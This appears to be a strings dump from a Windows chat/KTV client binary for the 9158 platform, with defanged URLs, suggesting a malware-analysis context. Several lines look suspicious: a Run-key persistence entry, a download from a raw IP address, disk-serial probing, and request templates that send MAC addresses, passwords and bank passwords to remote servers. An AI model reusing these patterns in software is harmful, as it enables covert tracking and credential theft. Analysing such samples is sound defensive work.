ap@CUIButtonTemplate@@1UAFX_MSGMAP@@B?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z?LoadSkin@CAppSysOperation@@UAEHPAX@Z?FitBitmapSize@CAppSysOperation@@UAEXXZ?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B?GetBitmapHeight@CAppSysOperation@@QAEHXZ?GetBitmapWidth@CAppSysOperation@@QAEHXZ?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZMVUILib.dllMSIMG32.dllMFC42.DLLMSVCRT.dll_acmdlnWinExecGetCPInfoGetWindowsDirectoryAKERNEL32.dllUSER32.dllGDI32.dllRegCloseKeyRegOpenKeyExARegCreateKeyExAADVAPI32.dllShellExecuteASHELL32.dllCOMCTL32.dllole32.dllOLEPRO32.DLLOLEAUT32.dllWSOCK32.dllMSVCP60.dllGdiplusShutdowngdiplus.dllpublictool.dllIdleTrac.dllNETAPI32.dllSHLWAPI.dllWINMM.dllpdh.dll9158.exe?GetPassword@CRoomInfo@@QAE?AVCString@@XZ?GetPort@CRoomInfo@@QAEHXZ?SetPassword@CRoomInfo@@QAEXPBD@Z?SetPort@CRoomInfo@
@QAEXH@ZItemList/Item[ItemName = '%s']/ItemTextItemList/Item[ItemID = %d]/ItemTextIDispatch error #%dFSkinRes\HollSplitter.bmpSkinRes\VIPRoomSkin\row.bmp%s\%s%s9158.exechatQK.xmlSkinRes\unlock.bmpdance_room/dance_coffer.aspxuseridx=%s&userpass=%s&type=1doid=%d&fromid=%d&stepid=%d%s?url=%sm_lpNormal->CopyHoleDC(%d, 0, %d, %d)m_lpActive->CopyHoleDC(0, 0, %d, %d)%e rcRect(%d,%d,%d,%d)CBmpProgCtrl..........................................%f*%d = %d//player.iniSkinRes\BroadCastBtn.bmpSkinRes\Broadcastclose.bmpOnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"OnDocumentComplete: URL="%s"OnProgressChange: progress=%d, progress_max=%dOnNavigationComplete2: URL="%s"OnStatusTextChange: text="%s"OnTitleChange: text="%s"\SkinRes\fragment.bmpactive.ini.PAVCInternetException@@itemboxconfig.xmlfaceconfig.xmlitemconfig.xml\Fruit\fruit.xmlBanner.xmlcar.xml\allplat.xml%s,%ld,%d,%d,%d,%d,%sDownLoad.exe\SkinRes\waring.bmphXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg%s(%d)User32.DLLSkinRes/DriftingHorn.png%s&userid=%s&type=%d\tui_AD.ini\logincount.iniToOpenUrl2GotoWebUrl2UserLoginToOpenUrlGotoWebUrlOnWebMessageBoxMsgEnterRoomAppOpenUrlLoginErrorRoomPassAdUser//weibo.inidiv.img50 img { max-width:60px; max-height:60px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));SkinRes\spinbtn_leftright.bmpSkinRes\flashTab.bmpSkinRes\flashTabDown.bmp%d/%dSkinRes\MoneyTip.bmp%Y-%m-%d %H:%M:%S %W-%A%s\*.*DynamicEffects\LightSticks.dbDynamicEffects\CaiShenImages.dbDynamicEffects\FireworksImages.db\DynamicEffects.zipDynamicEffects\DynamicEffects.zip\\.\PhysicalDrive%d\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
HallClose.ini
broadHistory.txt
SOFTWARE\9158web\%s
skinres\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s
6,%s,%s,0,0
6,%s,%s,%s,%s,%s,%s,%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
skinres\skin.ini
//HallClose.ini
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
SOFTWARE\9158web
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
idx=%s&u_name=%s&c_name=%s
tiaoshi: %s===>%s
hXXp://room.9158.com/apps/webloginapi.aspx
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LastLoginType
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SOFTWARE\9158web\
allplat.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content:
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
%s%H:%M:%S%s\%s.loghXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%shXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktvhXXp://room.9158.com/ktv_new/free_mic.aspx?userid=hXXp://room.9158.com/ktv_new/song_in.aspx?userid=&r=%ddance_room_new/click_save.aspxhXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%shXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d9158.comtiao58.comSOFTWARE\t58web&userid=%s&intype=2&type=%s&type=%s//skinres//MoneyRestPass.bmp'>
>> #sel1##p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'">#p2#
#p1#
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s%s-%s|HistoryRoom.xmlhXXp://room.9158.com/ktv_new/lately_room.aspx?r=hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next 'href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '')){window.external.OnHistory_Showinfo(4,#pa#);}"\skinres\fav\sel1.gif' style='border:none;'>hXXp://room.9158.com/images/newten/go-home.gif#purl#hXXp://room.9158.com/ktv_new/head1.jpgclass='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"\skinres\fav\sel2.gif' style='border:none;'>iexplore.exehXXp://cugame.9158.com/active/app/load.htmlogin=hXXp://VVV.9158.com/client/login/loginback.aspx?skinres\RankRate.bmpskinres\Hall\SearchRoomTopRight.bmpskinres\Hall\SearchRoomTopLeft.bmpskinres\Unknown.jpgskinres\scroll.bmp\Game\ddvGame.iniSkinRes//none.bmpSkinRes\TreeStatus.bmpSkinRes\Hall\searchRoombtn.bmpSkinRes\Hall\headbutton.bmpSkinRes\Hall\MiniInfor.bmpSkinRes\Hall\bag.bmpSkinRes\systemCenter.bmpSkinRes\set.bmpSkinRes\mybank.bmpSkinRes\vip.bmpSkinRes\systemSet.bmpSkinRes\systemReg.bmp\SkinRes\IMToolBar.bmpHead\era.bmpHead\crown.bmpHead\topestpurple2.bmpHead\topestpurple.bmpHead\DiamondPurple2.bmpHead\DiamondPurple.bmpHead\queenPurple2.bmpHead\queenPurple.bmpHead\Purple2.bmpHead\Purple.bmpHead\purplevip2.bmpHead\purplevip.bmpHead\level15.bmpHead\redvip.bmpHead\0_bluevip.bmpHead\paliesman.bmponclick="window.external.OnclickHead('1')">hXXp://Head\user_photo.bmphXXp://vip.9158.com/Head\H5_2.bmpHead\H5_1.bmpHead\H4_2.bmpHead\H4_1.bmpHead\H3_2.bmpHead\H3_1.bmpHead\H2_2.bmpHead\H2_1.bmpHead\H1_2.bmpHead\H1_1.bmpHead\H0_2.bmpHead\H0_1.bmp-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"%Y%m%d%s\%d\%sSkinRes\BtnMinInfor.bmpSkinRes\BtnCloseInfor.bmp%s&uidx=%sSkinRes\brInfor.bmpSkinRes\blInfor.bmpSkinRes\trInfor.bmpSkinRes\tlInfor.bmp%s %s%d||%d||%d||%s.img50 { width:50px; height:50px; text-align:center; }div.img50 img { 
max-width:50px; max-height:50px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));%s x%dskinres\message.bmpupdateitem.dllhXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s%s;%sLoginDlgLoginDlg2//banner//logbg.bmpSkinRes\admess.bmp\SkinRes\admess.bmp" width="' target='_blank' onFocus='this.blur()'>\guestlogin.iniSkinRes\TG\mins1.bmp//banner//log_min.bmpSkinRes\TG\closes1.bmp//banner//log_close.bmpHall_LoginMenuLogin_GuestHall_LoginCancelHall_LoginOKHallLoginRegLogin_WeiboLogin_AlipayLogin_QRLogin_QQLogin_idxLogin_UserGuestLogin_TuiGetLoginNodeData.aspxdl.week8.netplatname=%s&userid=%s&loginip=%s&loginport=%d/Error.txtCLoginDlg m_nLoginType!=nTypehXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspxSysMsgCloseBtnskinres\login.gifhXXp://VVV.9158.com/?code=SkinRes/IeClose.png%H : %M %Y/%m/%dnIDKeyMsgCloseBtnSockClient.dllMulti*.dll.PAVCObject@@.PAVCException@@.PAVCFileException@@%sBugReport.exe ,%sFlags:XDS:X ES:X FS:X GS:XSS:ESP:X:X EBP:XCS:EIP:X:XEAX:XEBX:XECX:XEDX:XESI:XEDI:XFault address1: X X:X %sException code1: X %s//build4.5%d-%d-%d %d:%d:%d***************************************************NTDLL.DLLFLT_INVALID_OPERATIONFLT_DENORMAL_OPERAND
>>
X X X:X %s
SkinRes\buttonmi.bmp
SkinRes\roomclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&userid=%s
%s&r=%d
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
//91KboxVCamSetup.exe
//9158VCamSetup.exe
//91KboxVCamSetup.exe
91KboxVCamSetup.exe
//9158VCamSetup.exe
9158VCamSetup.exe
C:\2.txt
%s//in_userchange.aspx?%s
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://cugame.9158.com/active/roomapply/apply.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
.photo { position:relative; width:540px; height:650px; margin:0px auto; }
.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,
.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }
.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }
.photo .img .img_in { display:table; width:480px; height:640px; }
.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }
.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }
* html .photo .img img {
_width: expression(this.offsetWidth > 480 ? '480px': true); }
.photo .prev, .photo .prev:hover,
.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }
.photo .prev { left:10px; }
.photo .prev:hover { }
.photo .next { right:10px; _left:445px; }
.photo .next:hover { }
.photo .down,
.photo .down:hover,
.photo .share_t,
.photo .share_t:hover,
.photo .share_qzone,
.photo .share_qzone:hover,
.photo .share_weibo,
.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }
.photo .down { left:350px; }
.photo .down:hover { }
.photo .share_t { left:120px; }
.photo .share_t:hover { }
.photo .share_qzone { left:180px; }
.photo .share_qzone:hover { }
.photo .share_weibo { left:240px; }
.photo .share_weibo:hover { }